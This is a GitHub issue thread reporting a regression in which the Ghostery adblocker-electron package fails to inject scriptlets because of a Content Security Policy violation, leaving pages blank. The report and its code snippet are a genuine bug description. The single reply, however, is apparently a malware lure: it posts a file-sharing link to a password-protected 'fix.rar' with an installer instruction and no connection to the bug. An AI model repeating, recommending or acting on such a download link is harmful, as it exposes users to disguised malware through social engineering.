### ISSUE TITLE
[adblocker-electron] fails to inject scriptlet due to CSP issue

### ISSUE THREAD

**Issue by PascalPixel** [ghostery/adblocker#4234]
Regression of #3819

- This has started failing again around August 10, it effects Reddit, X, YouTube, and Instagram
- You can still use the [original example repo](https://github.com/spikecodes/electron-adblock-test/) to reproduce it 
- You must reload a few seconds after initial boot to ensure lists are loaded
- You can upgrade the packages to the latest and it still seems to fail
- Could we prioritize gracefully failing vs. fixing this bug? A white-out screen is pretty alarming to my users 😄

```js
// @cliqz/adblocker-electron-preload/index.js
function insertNode(node, document) {
  const parent = document.head || document.documentElement || document;
  if (parent !== null) {
    parent.appendChild(node); // this CSP violation can not be caught by try/catch, hence the crash (blank page)
  }
}
```

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
